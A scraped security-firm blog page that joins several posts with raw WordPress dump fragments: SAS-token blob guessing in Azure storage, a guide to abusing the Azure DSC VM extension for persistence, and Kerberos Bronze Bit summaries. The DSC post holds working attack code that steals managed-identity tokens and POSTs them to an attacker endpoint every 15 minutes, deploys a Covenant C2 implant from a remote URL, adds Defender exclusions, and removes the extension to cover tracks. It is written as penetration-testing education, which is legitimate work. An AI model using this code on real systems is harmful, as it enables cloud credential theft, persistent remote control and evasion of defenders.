curl "https://otheraccount.blob.core.windows.net/container-dev/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 1
curl "https://otheraccount.blob.core.windows.net/container-dev/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D" Dev Content 1

For one last time, we’ll break down our SAS:

  • Resource URL
    • Domain Name: otheraccount.blob.core.windows.net
      • We can identify the storage account name: otheraccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /container-dev/content1.txt
      • We can identify the container name: container-dev
      • We can identify the blob we’re accessing: content1.txt
  • SAS Token:
    • Signed Permissions (sp): r
      • We’re authorized for only the read action.
    • Signed Services (ss): b
      • We’re only authorized for the Blob service. 
      • This must be an account SAS because this parameter is set. 
    • Signed Resource Types (srt): o
      • We’re authorized only for object-level APIs.
    • The additional values are required for the SAS token but are not very useful to us.

We can see that this SAS is much more restricted. We won’t be able to hop between services or use the list action like before. But with a little bit of luck, we won’t even need that. 

Looking at the blob name content1.txt, it’s worth checking if there are any other blobs we could guess. Let’s update our SAS to point to content2.txt and see what happens.

curl "https://otheraccount.blob.core.windows.net/container-dev/
content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 2
curl "https://otheraccount.blob.core.windows.net/container-dev/ content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D" Dev Content 2

It worked! Even though we couldn’t list all the blobs, if we successfully guess the blob name (or it’s disclosed to us through other means) we can still gain access to it. Within a real web application, this may lead to an Insecure Direct Object Reference (IDOR) vulnerability. 

Let’s take a look at that container name too. If we were given access to container-dev then let’s check for container-prod as well. 

curl "https://otheraccount.blob.core.windows.net/container-prod/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z
&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5
gl2G6FsSMtcFOuNrthM%3D"
Prod Content 1
curl "https://otheraccount.blob.core.windows.net/container-prod/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z &st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5 gl2G6FsSMtcFOuNrthM%3D" Prod Content 1

Nice! We’re able to directly reference blobs within other containers in the same storage account if we can guess the correct URL path. As you can imagine, it’s not too difficult to use wordlists to build our guesses and test different URLs. In fact, the MicroBurst toolkit already provides Invoke-EnumerateAzureBlobs, which enables the enumeration of public blobs and containers. Karl Fosaaen has previously written about this script on the NetSPI blog. 
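
A quick sketch of that kind of enumeration, assuming MicroBurst has been cloned locally (parameter names may differ between versions):

Import-Module .\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base otheraccount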

This example shows that even a fairly limited SAS can still be abused. In particular, the account SAS type can provide vast access into a storage account and is a prime target for pentesters. 

Conclusion

Whenever we’re given direct access to Azure storage accounts through a shared access signature, we should take a close look to understand our authorization. While the SAS has many components, it’s not too difficult to break down once you know which parts matter most. Hopefully this guide can serve as a reference the next time you come across an SAS during a pentest and help you find new content. 

Special thanks to Karl Fosaaen for the blog suggestion and Josh Magri for reviewing this write up. 

NetSPI is always looking for skilled penetration testers to join our team! Visit https://netspi.com/careers to explore our open roles.

+ + +

In a previous blog, I described how anyone with the Contributor role in an Azure subscription can run arbitrary scripts on the VMs of that subscription. That blog utilizes the Run Command feature and the Custom Script Extension to execute the payloads. This blog will explore how pentesters can also use the Desired State Configuration (DSC) VM extension to run arbitrary commands, with built-in functionality for recurring commands and persistence.   

Desired State Configuration in Azure

PowerShell Desired State Configuration (DSC) is existing Windows functionality that allows system administrators to declare how a computer should be configured with configuration scripts and resources. This may include installing/running services, local user management, downloading files or running PowerShell scripts. Once enabled, the Local Configuration Manager (LCM) subsystem will automatically and continually monitor the computer’s current configuration, and perform any actions required to apply the desired configuration. 

More recently, Microsoft has brought first-class support for DSC into Azure. This allows Azure administrators to utilize DSC’s powerful functionality to configure and monitor their Azure VMs at the cloud scale. Azure offers two methods of using DSC: Azure Automation State Configuration and the DSC VM extension.

Azure Automation State Configuration vs Desired State Configuration VM Extension

Azure Automation State Configuration allows administrators to use an Azure Automation Account to deploy DSC at scale across their cloud VMs and on-premises systems. This feature is integrated with the Azure Portal and provides a UI to deploy configurations and monitor the systems’ compliance. The DSC artifacts are deployed via a “pull server.” The systems will periodically report their configuration to the Automation Account and retrieve the latest configurations.

While this is very practical functionality, it’s not our best option as pentesters for a couple reasons. First, it’s not a stealthy technique for controlling the target systems. Cloud administrators can easily observe usage of the Automation State Configuration feature in the portal.  Second, when the target systems are updated to pull their DSC artifacts from our Automation Account, this may overwrite legitimate usage of the DSC feature. The target systems may lose their existing configuration, and this may interrupt daily operations. 

We’ll avoid these problems by using the DSC VM extension instead. When using the VM extension, DSC artifacts are pushed to individually targeted systems, instead of being pulled from a centralized Automation Account. When deploying artifacts, we can also check to see if DSC is already in use on the system, and if so, stop the deployment. This prevents us from overwriting existing, legitimate configurations. Lastly, the VM extension can be quickly removed after the DSC artifacts are pushed, making this much more difficult to detect in the Azure portal. The VM extension provides more targeted, fine-grain control and allows us to remain under the radar.
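
As a sketch of that pre-deployment check, we can list a target VM’s extensions and look for an existing DSC extension (the resource group and VM names reuse the example appearing later in this post):

Get-AzVMExtension -ResourceGroupName tester -VMName jk-dsc-testing |
	Where-Object { $_.ExtensionType -eq "DSC" } |
	Select-Object Name, Publisher, ExtensionType, ProvisioningState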

Running Arbitrary Scripts Through the Desired State Configuration VM Extension

While not exactly the intended use, plain PowerShell scripts can be run directly through the DSC VM extension. Other features such as RunCommand and the Custom Script Extension are better suited for this task, but it is interesting to see that it works (despite not actually providing any configuration). Let’s consider the following PowerShell script:

echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt

DSCHello.ps1

To setup the script as a DSC, we’ll run the following commands from our workstation:

  1. The Publish-AzVMDscConfiguration cmdlet will compress and upload the script to a storage account of our choice.
  2. The Set-AzVMDscExtension cmdlet will add the DSC VM extension to the “jk-dsc-testing” VM. Once the extension is added, it will automatically download the script from the storage account and run it. 
PS C:\> Publish-AzVMDscConfiguration -ConfigurationPath .\DSCHello.ps1 -ResourceGroupName tester -StorageAccountName <your-storage-account-name> 
[TRUNCATED]

PS C:\> Set-AzVMDscExtension -VMName jk-dsc-testing -ConfigurationArchive "DSCHello.ps1.zip" -ConfigurationName "DSCHello" -ResourceGroupName tester -ArchiveStorageAccountName <your-storage-account-name> -Version "2.83"
Set-AzVMDscExtension : Long running operation failed with status 'Failed'. Additional Info:'VM has reported a failure when processing extension 'Microsoft.Powershell.DSC'. [TRUNCATED]

After about a minute, the second Set-AzVMDscExtension command returns an error. This is expected because our DSCHello.ps1 script does not actually include a valid DSC configuration. Despite this error, our script was executed on the target VM. We can confirm this by using the RunCommand feature to check the contents of the output file: C:\dsc_hello.txt. 
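
For example, the file can be read with the Invoke-AzVMRunCommand cmdlet. A minimal sketch, assuming a hypothetical helper script check.ps1 that contains only Get-Content C:\dsc_hello.txt:

PS C:\> Set-Content -Path .\check.ps1 -Value 'Get-Content C:\dsc_hello.txt'
PS C:\> Invoke-AzVMRunCommand -ResourceGroupName tester -VMName jk-dsc-testing -CommandId 'RunPowerShellScript' -ScriptPath .\check.ps1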

RunCommand Output

The output within the file confirms that the script was executed successfully, despite the error returned by the Set-AzVMDscExtension command. It also confirms that our script is running as SYSTEM on the VM. 

While it’s nice to know that the DSC VM extension can be used for one-off scripts, there are better tools for this task at our disposal. We’ll instead focus on utilizing the power of DSC for our more common tasks as pentesters. 

Practical DSC Extension Usage

While the above process does result in privileged script execution, it doesn’t maximize the functionality offered by the DSC VM extension. We can improve upon this in several ways. 

Using Actual DSC Configuration Artifacts

The simplest improvement is to add an actual configuration to our script. There are many different types of DSC Resources that can be used within a DSC configuration. The most versatile is the Script Resource which we’ll use to wrap whatever functionality we’d like to deploy. If we were rewriting the above example to use a Script Resource, that would appear in our DSC script as:

Configuration DSCHello
{
	Node localhost
	{
		Script ScriptExample
		{
			SetScript = {
				echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt
			}
			TestScript = { 
				return Test-Path C:\dsc_hello.txt 
			}
			GetScript = { @{ Result = (Get-Content C:\dsc_hello.txt) } }
		}
	}
}

DSCHello.ps1 (with Configuration and Script Resource)

When deployed via the DSC VM extension with the previous commands, the Set-AzVMDscExtension command will now complete successfully because we’ve provided a well-formed DSC configuration. We’ve also provided a TestScript which will test for the presence of the C:\dsc_hello.txt output file. 

Automatic Recurring Execution

One of the key features of DSC is the capability to detect if a system has drifted from its desired state, and to automatically apply any necessary configuration changes. We can use this built-in functionality to automatically run our commands as many times as we’d like. We’ll see some additional examples of this later in the post, but for now we’ll continue the example from above. Note the TestScript ScriptBlock in the previous code segment. If the C:\dsc_hello.txt file is ever removed from the file system after the initial execution, the TestScript command will return false, and the SetScript command will be run again. 

While this capability is built into DSC, it’s not enabled by default. But we can enable it while deploying our DSC artifacts to the target system. To do that, we’ll prepend the following commands to our growing DSCHello.ps1 script. 

[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
    Node localhost
    {
        Settings
        {
            RefreshFrequencyMins           = 30
            RefreshMode                    = 'PUSH'
            ConfigurationMode              = 'ApplyAndAutoCorrect'
            AllowModuleOverwrite           = $False
            RebootNodeIfNeeded             = $False
            ActionAfterReboot              = 'ContinueConfiguration'
            ConfigurationModeFrequencyMins = 15
        }
    }
}
DscMetaConfigs -Output .\output\
Set-DscLocalConfigurationManager -Path .\output\

Commands to be added to DSCHello.ps1 to enable automatic recurring execution.

These commands will update the DSC Local Configuration Manager (LCM), which is the subsystem responsible for keeping the system in its configured desired state. The key update is changing the “ConfigurationMode” value to “ApplyAndAutoCorrect” to ensure our SetScript commands are executed whenever the TestScript block returns false. After this update, the LCM will check the system’s configuration every 15 minutes and apply any necessary configurations. Unfortunately, this is the most frequent schedule that can be configured.
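
If we want to verify these settings later, the built-in Get-DscLocalConfigurationManager cmdlet reports the LCM’s active values. A minimal sketch, run on the target VM (for example, via RunCommand):

# Inspect the active LCM settings on the target VM
Get-DscLocalConfigurationManager | Select-Object ConfigurationMode, ConfigurationModeFrequencyMins, RefreshMode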

Polite Execution: Checking if DSC is Already in Use

As mentioned earlier, we wouldn’t want to make these DSC/LCM updates if the target system is already using DSC for a legitimate purpose. In a standard pentest, this has too high of a risk of disrupting normal functionality. And in a red team scenario, this change could lead to more rapid detection by the blue team. 

To avoid this, we can update our script to check if the system currently has any DSC configuration already applied. By prepending the following commands to our ever-growing DSCHello.ps1 file, the script will first check if there’s an existing configuration, and exit if any exists. 

# Get-DscConfigurationStatus throws an error if DSC has never been used on this
# system, so $? will only be $true when a status was actually returned. A Type
# other than 'Initial' indicates an existing configuration, so we bail out.
$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
    exit
}

Commands to be added to DSCHello.ps1 to exit if DSC is already in use.

With this addition, our DSCHello.ps1 file is complete and ready for deployment. It will confirm that the DSC feature is not already in-use on the target system. It will configure the LCM to automatically re-execute our commands as needed. And it will complete successfully because it provides a well-formed DSC configuration and resource. The complete version of this example script is available for review here.  

Covering Tracks: Removing the DSC VM Extension

After deploying the DSC VM extension, it can be viewed in the Azure Portal under the target VM’s “Extensions” blade. 

The DSC extension listed in the target VM’s “Extensions” blade

If you click the “View detailed status” link, there are execution details, including some of the script output. To cover our tracks, we can eliminate this information by simply removing the DSC VM extension itself using the Remove-AzVMDscExtension cmdlet. This removes the extension information from the portal and deletes the deployment artifacts from the target VM. However, it does leave behind the existing logs in the C:\WindowsAzure\Logs\Plugins\Microsoft.Powershell.DSC\<VERSION> directory.
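
Removal is a one-liner; a sketch using the same resource names as the earlier deployment:

PS C:\> Remove-AzVMDscExtension -ResourceGroupName tester -VMName jk-dsc-testing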

Fortunately for us though, this does not remove the deployed DSC configuration from the target VM. If configured as a recurring or persistent task, it will continue to run on the set schedule. We’re free to clean up the extension and artifacts, and still retain our functionality.

Deploying Pre-Configured DSC Artifacts

The official Set-AzVMDscExtension cmdlet is very useful, but it assumes that the DSC artifacts to be deployed were uploaded to a caller-controlled storage account using the Publish-AzVMDscConfiguration command. While this is generally true for its intended usage, this is not ideal for pentesters. To use the Set-AzVMDscExtension command against a targeted VM in an engagement, we would have to also upload the DSC artifacts into a storage account within the same Azure subscription using the Publish-AzVMDscConfiguration command. This leaves behind additional artifacts which may be detected by the blue team, and reduces the reusability of our artifacts. 

As a workaround, I’ve added the Invoke-DscVmExtension function to the MicroBurst framework. This is a reimplementation of the Set-AzVMDscExtension cmdlet which instead deploys DSC artifacts hosted at any publicly accessible URL. The example DSC artifacts used throughout this blog are hosted in the MicroBurst GitHub repo and available for use. We can use the Invoke-DscVmExtension function to deploy the DSC VM extension and download our pre-made artifacts from there. This greatly increases the reusability of these artifacts. 

Additionally, the Invoke-DscVmExtension function automatically removes the DSC VM extension from the target system after the deployment. This results in a stealthier overall deployment.

We can use this single function to do the following:

  1. Add the DSC VM extension to a target VM which performs the following:
    1. Download the publicly hosted, reusable artifacts from an input URL.
    2. Check if any DSC configurations are already in use.
    3. Update the Local Configuration Manager to automatically run our deployed configuration every 15 minutes. 
    4. Run the provided script as SYSTEM.
  2. Remove the DSC VM extension to cover our tracks in the portal.

And here’s how it looks in action:

PS C:\ > Invoke-DscVmExtension -Name jk-dsc-testing -ResourceGroupName tester  -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DSCHello.ps1.zip"
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Execution of Invoke-DscVmExtension function

Example 1: A Recurring Task to Export Managed Identity Tokens

An Azure VM can be directly assigned permissions to other Azure resources through the VM’s managed identity. NetSPI’s Karl Fosaaen has thoroughly explored how attackers and pentesters can exploit this in his previous blogs. If you’d like a deeper dive into managed identities, I recommend his in-depth review here. In that blog, Karl describes how anyone with command execution on the VM can obtain an access token for that VM’s managed identity by sending an HTTP request to the Azure Metadata Service URL. 

Additionally, NetSPI’s Josh Magri explored in his blog post how bearer tokens can be passed to the Azure REST APIs to perform actions authorized as that identity. This provides a straightforward mechanism for enumerating the target subscription and moving laterally/vertically. 

Let’s combine these concepts with the DSC VM extension. We’ll deploy a DSC configuration which will execute our commands. Our configuration will send a request to the Azure Metadata Service from the target VM and obtain the bearer token for that VM’s managed identity. Once we’ve obtained the bearer token, we’ll exfiltrate it from the server by sending an HTTP POST request to a URL of our choice. 

The full code for the script is available for review here, but the core DSC configuration is included below:

Configuration ExportManagedIdentityToken
{

  param
  (
    [String]
    $ExportURL
  )

  Import-DscResource -ModuleName 'PSDesiredStateConfiguration'

  Node localhost
  {
    Script ScriptExample
    {
      SetScript = {
        # Request a token for the VM's managed identity from the Azure Instance
        # Metadata Service (IMDS is reachable only over HTTP at this link-local address)
        $metadataResponse = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
        # Force modern TLS for the outbound request, then POST the raw token response to our endpoint
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12
        Invoke-RestMethod -Method 'Post' -URI $using:ExportURL -Body $metadataResponse.Content -ContentType "application/json"
      }
      TestScript = {
        return $false
      }
      GetScript = { return @{result = 'result'} }
    }
  }
} 

The ExportManagedIdentityToken.ps1 Configuration Snippet

In the above configuration, there are a few key components:

  1. Note that we’re passing in the $ExportURL value as a Configuration parameter. This allows us to re-use the configuration and decide at deployment time where the bearer token will be exfiltrated. 
  2. As described earlier, the SetScript script block obtains the bearer token from the Azure Metadata Service URL and sends it as a POST request to the $ExportURL value.
  3. The TestScript ScriptBlock always returns false. This ensures the commands are executed every 15 minutes, guaranteeing we always have a fresh, valid bearer token for extended persistence. 

To receive and process the bearer token sent by the script, we’ll deploy a simple PowerShell Azure Function App to a separate subscription under our control. This will extract the incoming bearer token and call the Azure REST APIs to review the permissions assigned to it. The full code for the Function App is available here and essentially copy-pasted from Josh’s blog in the “Enumeration” section. 
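
For reference, the core of such a function is only a few lines. Here’s a minimal sketch (not the full code from the repo) of a standard PowerShell HTTP-triggered function that extracts the token:

using namespace System.Net
param($Request, $TriggerMetadata)

# The DSC script POSTs the raw JSON token response; Azure Functions parses a
# JSON body into an object, so the token is available as a property
$accessToken = $Request.Body.access_token
Write-Information "Received access token: $accessToken"

# From here the token can be passed to the Azure REST APIs for enumeration
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
})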

We’ll deploy the script with the Invoke-DscVmExtension function described in the previous section. In this example, we’ll pass the target VM via the pipeline, and we’ll pass the $ExportURL value as a ConfigurationArgument. The function will automatically handle the deployment and cleanup.

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/ExportManagedIdentityToken.ps1.zip" -ConfigurationArgument @{ExportURL="https://[your-function-app].azurewebsites.net/api/TokenEndpoint"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

During the deployment, and every 15 minutes thereafter, the bearer token will be POSTed to the Function App. We can monitor the Function App’s logs to observe the incoming value and which permissions are assigned to the managed identity. 

2021-06-08T04:13:45.474 [Information] Executing 'Functions.MgCatchingFunction' (Reason='This function was programmatically called via the host APIs.', Id=d0dd2ee5-6b47-48c6-8bf2-10e74197e769)
2021-06-08T04:13:45.481 [Information] INFORMATION: PowerShell HTTP trigger function processed a request. Incoming JSON contents
2021-06-08T04:13:45.486 [Information] OUTPUT:
2021-06-08T04:13:45.487 [Information] OUTPUT: Name                           Value
2021-06-08T04:13:45.491 [Information] OUTPUT: ----                           -----
2021-06-08T04:13:45.491 [Information] OUTPUT: resource                       https://management.azure.com/
2021-06-08T04:13:45.492 [Information] OUTPUT: access_token                   eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.492 [Information] OUTPUT: expires_on                     1623209325
2021-06-08T04:13:45.492 [Information] OUTPUT: ext_expires_in                 86399
2021-06-08T04:13:45.493 [Information] OUTPUT: token_type                     Bearer
2021-06-08T04:13:45.494 [Information] OUTPUT: client_id                      367d6d5b-cf5f-4818-abb6-b6ea700b377f
2021-06-08T04:13:45.495 [Information] OUTPUT: not_before                     1623122625
2021-06-08T04:13:45.495 [Information] OUTPUT: expires_in                     83700
2021-06-08T04:13:45.495 [Information] INFORMATION: Access token
2021-06-08T04:13:45.496 [Information] OUTPUT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.496 [Information] INFORMATION: Principal ID
2021-06-08T04:13:45.496 [Information] OUTPUT: 821ace7f-e6d8-4ba2-8304-ef45fbb4fb19
2021-06-08T04:13:45.496 [Information] INFORMATION: /subscriptions/d4[REDACTED]b2/resourcegroups/tester/providers/Microsoft.Compute/virtualMachines/jk-dsc-testing
2021-06-08T04:13:45.497 [Information] INFORMATION: Subscription ID
2021-06-08T04:13:45.497 [Information] OUTPUT: d4[REDACTED]b2
2021-06-08T04:13:45.497 [Information] INFORMATION: VM Name
2021-06-08T04:13:45.497 [Information] OUTPUT: jk-dsc-testing
2021-06-08T04:13:46.001 [Information] OUTPUT: Current identity has permission Reader on scope /subscriptions/d4[REDACTED]b2

Function App logs showing the exfiltrated bearer token and the permissions assigned to the managed identity

Example 2: A Persistent Command and Control Implant

Using DSC, not only can we execute tasks on a recurring schedule, but we can also utilize its self-correcting behavior to deploy persistent C2 implants on the target VM. In the example below, we’ll be using Covenant as our C2 framework. This will both host our malicious executable and listen for its callback. This blog won’t cover how to use Covenant, but for more information on that topic, please see my previous blog post in which I deployed Covenant’s implants (“grunts”) using Azure’s Custom Script Extension. 

The DeployDSCAgent DSC configuration performs the following tasks (the Defender exclusions correspond roughly to the cmdlet calls sketched after this list):

  1. Create a destination folder for the executable to be downloaded into.
  2. Create a Windows Defender exclusion for the destination folder. 
  3. Create a Windows Defender exclusion for the full path of the executable. 
  4. Create a Windows Defender exclusion for the executable’s process.
  5. Download the hosted implant from the input URL. 
  6. Execute the malicious implant, providing remote control as the SYSTEM process.
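
As noted above, outside of DSC those Defender exclusions map roughly to the following cmdlet calls (a sketch; the folder and file names are placeholders):

# Exclude the download folder, the executable's full path, and its process from Defender scanning
Add-MpPreference -ExclusionPath 'C:\implant'
Add-MpPreference -ExclusionPath 'C:\implant\GruntHTTP40.exe'
Add-MpPreference -ExclusionProcess 'GruntHTTP40.exe'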

The full code for the DSC configuration is relatively simple, but a bit too long to include here. If you’re interested, the code is available for review on GitHub. Deploying the DSC extension to the target VM is as straightforward as before:

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DeployDSCAgent.ps1.zip" -ConfigurationArgument @{ImplantURL="https://172.18.0.5/GruntHTTP40.exe"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the DeployDSCAgent script via the Invoke-DscVmExtension function

A few minutes after the Invoke-DscVmExtension command is started, our Covenant listener will detect that the implant has been executed and is awaiting further commands. 

The Covenant implant is deployed and connects back to the C2 server.

The beauty of using DSC for this task is that the status of the above 6 tasks will be automatically checked every 15 minutes. If any of them are incomplete (for example, if a sysadmin deletes our implant, kills the process, or removes the Defender exclusions) then they will be automatically re-executed along with any previous steps. This provides us with robust persistence on the target VM.  

Final Thoughts

We’ve seen how the DSC VM extension provides yet another mechanism for privileged Azure users (such as those with the Contributor role) to achieve command execution on Azure VMs. While other VM extensions provide command execution as well, the DSC VM extension offers built-in support for recurring commands and advanced persistence techniques. The Invoke-DscVmExtension function added to the MicroBurst framework provides easy reusability of premade, public DSC configurations for use on multiple pentest engagements. Altogether, the DSC VM extension is a robust tool which should be considered by any Azure pentester.

[post_title] => Azure Persistence with Desired State Configurations [post_excerpt] => See how the Azure Desired State Configuration VM Extension can be utilized by pentesters for robust persistence and recurring tasks. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-persistence-with-desired-state-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:44 [post_modified_gmt] => 2023-03-16 14:24:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25653 [menu_order] => 387 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 25556 [post_author] => 52 [post_date] => 2021-06-09 07:00:00 [post_date_gmt] => 2021-06-09 07:00:00 [post_content] =>

On June 9, 2021, NetSPI Security Consultant Jake Karnes was featured in a SecureAuth article:

 

In December 2020, another Kerberos authentication vulnerability was made public: the Kerberos Bronze Bit Attack (CVE-2020-17049). Jake Karnes, Managing Consultant at NetSPI, revealed his research after Microsoft released a patch to fix it. The Kerberos Bronze Bit attack was named in the spirit of the widely known Golden Ticket and Silver Ticket attacks, and exists in the way the Key Distribution Center handles service tickets and determines whether or not they can be used for delegation.

Let’s start with some Kerberos fundamentals. In general terms, delegation refers to the ability of a service account to act on behalf of a user account to access resources with the access privileges of the latter. The most common example is a web application impersonating a user when it accesses a backend database and retrieves some data under the user’s authority.

Microsoft offers two types of delegation: without restrictions, known as Unconstrained Delegation, and restricted to only certain services, which comes in two flavors: Constrained Delegation and Resource-Based Constrained Delegation. The Kerberos protocol, by itself, doesn’t have the ability to restrict delegation to a specific group of services. For this reason, Microsoft implemented two extensions that enable this behavior: Service for User to Self (S4U2self) and Service for User to Proxy (S4U2proxy).

The Bronze Bit Attack uses both protocols. First, it obtains a service ticket for a targeted user to a compromised service via S4U2self. Then, it tampers with this service ticket, modifying the forwardable flag. With this tampered ticket, it uses S4U2proxy to obtain a service ticket for the targeted user to the targeted service. Finally, with the last service ticket, the attacker can impersonate the targeted user.

So, surely you are wondering why this is possible. The answer: the forwardable flag is only protected by encrypting the service ticket with the first service’s password hash. If an attacker manages to compromise this service, it’s game over (unless you’re patched). They will be able to decrypt the ticket and flip the flag bit.

@jakekarnes42 used Impacket for the attack implementation and opened the pull request (PR) #1013 that added a new force-forwardable flag to getST.py. Thanks Jake, for using Impacket for this great implementation of the attack!

If you are interested in knowing more details about this, you can check this great series of posts from Jake here: overview, theory and exploitation.

 

Read the full article here: https://www.secureauth.com/blog/now-available-impacket-release-v0-9-23/

 

[post_title] => SecureAuth: Impacket Release v0.9.23 [post_excerpt] => On June 9, 2021, NetSPI Security Consultant Jake Karnes was featured in a SecureAuth article. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => secureauth-impacket-release-v0-9-23 [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:50:49 [post_modified_gmt] => 2022-12-16 16:50:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25556 [menu_order] => 395 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 21082 [post_author] => 53 [post_date] => 2020-12-24 07:00:05 [post_date_gmt] => 2020-12-24 07:00:05 [post_content] =>

Overview

In this presentation, NetSPI’s Senior Technical Architect Jake Karnes explains the inner workings of CVE-2020-17049: The Kerberos Bronze Bit Attack. Jake discovered this vulnerability and responsibly disclosed it to Microsoft, which provided patches in November and December of 2020. Once the patches became available, Jake shared the exploit which allows an attacker to bypass security features and escalate privileges within an Active Directory domain. 

The presentation provides an introduction to the Kerberos protocol and Microsoft’s use of Kerberos Delegation. If a better understanding of Kerberos has been on your “to-do” list, here’s a great opportunity to dive in and learn more. After covering Kerberos, the vulnerability and its exploit are explained, including its potential impact in a compromised environment. The presentation also includes a demonstration of the exploit in action. In the demonstration, we see how an attacker can escalate privileges from a compromised user account to gain access to additional sensitive systems. 

Key highlights:

The Kerberos protocol  

To get started, having a high-level understanding of the Kerberos protocol is important.

Here’s a brief overview: 

  • The Kerberos protocol is a ticket-based authentication protocol, which means it's used to prove users are who they say they are to other entities in their environment. For example, if a user wants to connect to a service, like a file share, or a database or a web application, they can use Kerberos to authenticate themselves.  
  • The protocol was originally developed at MIT and for the purpose of this webinar, we’re going to focus on how it’s used in a Windows environment.  
  • Kerberos uses symmetric key cryptography rather than public and private key pairs. Each entity has its own secret key: in the diagram, the user holds their red secret key and the service holds its own green secret key. The secret key is the entity’s password hash, and because each user is the only one who knows their password, they should be the only one able to produce that hash. In other words, if a user has the secret, they can prove their identity. 
  • Kerberos has a central authority called the key distribution center (KDC). In a Windows environment, this is the domain controller. The KDC holds a copy of everyone’s secret key: the user’s, the service’s green key, its own, and those of any other entities in the environment. A user can prove to the KDC that they control their secret key, and if the KDC accepts this proof, it will return a ticket. These tickets are then used as proof when authenticating to other services. 

How a user proves their identity to the KDC

The next piece is understanding how a user proves their identity to the KDC to get the ticket. The name of this process is the authentication service exchange. Here’s how the process works:

  • The user authenticates themselves to the KDC 
  • An encrypted timestamp proves they have access to the secret key (their hashed password) 
  • If successful, the KDC returns with an AS_REP message granting the TGT 

Once a user is authenticated by the KDC, it’s easier to access other services within the environment, such as a file share or database through a ticket-granting service exchange. The steps in this process include:

  • User requests a ticket for a service from the KDC 
  • Encrypted timestamp proves they have access to the previously shared logon session key 
  • The TGT contains the logon session key for the KDC (since the KDC doesn’t save it)  
  • If successful, the KDC returns with a TGS_REP message and produces a service ticket  

After the user receives the TGT and the service ticket, the third step in the process is the client/server exchange. The steps involved in this process are:  

  • User sends encrypted timestamp with service session key 
  • The service decrypts the service ticket using its long-term key (proving the service ticket came from the KDC) 
  • The service extracts the service session key and checks the encrypted timestamp 
  • The service checks the signature in the PAC with its long-term key  
    • This supplies the user’s authentication data upfront 
    • Optionally, the PAC is sent to the KDC to confirm its signature is valid too 
  • From there, authenticated communication can proceed 

Kerberos delegation 

The Kerberos protocol covers one user connecting to one service. But it gets more complicated when it comes to different services connecting to one another, such as a web application connecting to a database.  

For this type of connection, Kerberos delegation is used. Delegation enables one service to impersonate a user when connecting to another service, meaning the service authenticates as the user and is authorized as the user. Using the web application example above, this might be a web application writing to a database or reading from a file share on the user’s behalf.  

Types of Kerberos delegation include:

  • Unconstrained delegation 
    • “Trust the computer for delegation to any service (Kerberos only)” 
    • The user’s TGT is embedded into the service ticket 
    • This type of delegation is not recommended and if you find it within your environment, it’s important to turn it off  
  • “Classic” constrained delegation 
